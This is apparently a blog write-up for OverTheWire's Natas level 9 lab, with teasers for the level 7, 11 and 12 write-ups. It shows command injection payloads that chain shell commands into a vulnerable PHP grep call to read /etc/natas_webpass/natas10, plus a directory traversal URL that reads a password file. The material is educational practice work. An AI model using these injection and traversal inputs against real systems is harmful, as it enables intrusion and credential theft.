Skip to main content

Natas Level 9 Walkthrough: Code Injection

URL: http://natas9.natas.labs.overthewire.org

Objective

Gain access to the password for natas10.

Procedure:

  1. Open the website and inspect the PHP source code.

    Natas 9 Homepage


  2. Identify the vulnerable passthru function in the source code:
    passthru("grep -i $key dictionary.txt");
    Realize the potential for command injection by exploiting this vulnerability.

  3. Find the current directory by searching for:
    zzz; pwd; ls

    Explanation:
    • Utilize the semicolon to separate different commands.
    • Use zzz to ensure that grep returns no result.
    • Include pwd to print the current working directory.
    • Add ls to list the contents of the directory, avoiding issues with the word "dictionary.txt" hanging on its own.

    Natas 9 Injection


  4. Use the find command to locate any file related to natas10:
    zzz; find / -type f -name natas10 2>/dev/null; ls
    Output: 
    /etc/natas_webpass/natas10
dictionary.txt

  5. Search for the password by executing:
    zzz; cat /etc/natas_webpass/natas10; ls
    Output: 
    [natas_10_password]
dictionary.txt

  6. PS: Using only the semicolon and the command can also work in some situations:
    ; cat /etc/natas_webpass/natas10
    Output: 
    [natas_10_password]

     

    ______________________________________

    NthApostle

Labels:

Comments

Post a Comment

Popular posts from this blog

Natas Level 11 Writeup: XOR Encryption

1. Objective Find the password for natas level 12. 2. Introduction When we open the webpage for Natas 11, we are greeted with the following message: Cookies are protected with XOR encryption. What is XOR: XOR is a binary operation that returns true (1) only when the number of true inputs is odd. It compares corresponding bits of two binary numbers, resulting in 1 for differing bits and 0 for identical bits. Example: Let's consider two binary numbers, A = 1010 and B = 1101. 1010 X 1101 ------- 0111 In this case, A XOR B equals 0111 in binary, or 7 in decimal. XOR Property: If A XOR B = C, then A XOR C = B. Verification: Let A = 1010, C = 0111, and find B. 1010 X 0111 ------- 1101 The result is 1101 in binary, which is B. So, A XOR C equals B, confirming the XOR property. This property holds true for any combination of A, B, and C, demonstrating that given any two values, you can find the third using XOR. 3. Exploration Ch...
Post a Comment
Read more

Natas Level 7 Writeup: Directory Traversal

  URL: http://natas7.natas.labs.overthewire.org Open the Website : Exploration : Page Navigation: Clicking on the "home" and "about" pages reveals the following links: http://natas7.natas.labs.overthewire.org/index.php?page=home http://natas7.natas.labs.overthewire.org/index.php?page=about Hint in Source Code: Inspecting the source code provides a hint about how the application includes pages. Exploit : URL Parameter Manipulation: Replace the page parameter with the desired file path: http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8   Success : You have successfully manipulated the URL parameter to access the password for natas8. Proceed to the next level using the acquired information.   PS: In Natas0, it was stated that    All passwords are also stored in /etc/natas_webpass/. E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5 That is how we know that the file...
Post a Comment
Read more

Natas Level 12 Writeup: File Upload Vulnerability

  1. Objective Find the password for natas level 13. 2. Introduction The first thing we see is a form that gives us the ability to upload 'JPEG' images.    If proper checks have not been put in place to validate the uploaded file, it is highly likely that we may have a File Upload Vulnerability.  A File Upload Vulnerability is a security issue that arises when proper checks are not implemented to validate uploaded files. In this level, we explore the possibility of exploiting such a vulnerability. 3. Exploration Let's use the 'View source code' button to check what clues we can find there. The process that takes place on the server. A file name is generated before the page is served to the user The filename is stored in a hidden field called filename When a user uploads a file, the server checks if the filename field is present It prepares for the file to be saved in the ...
Post a Comment
Read more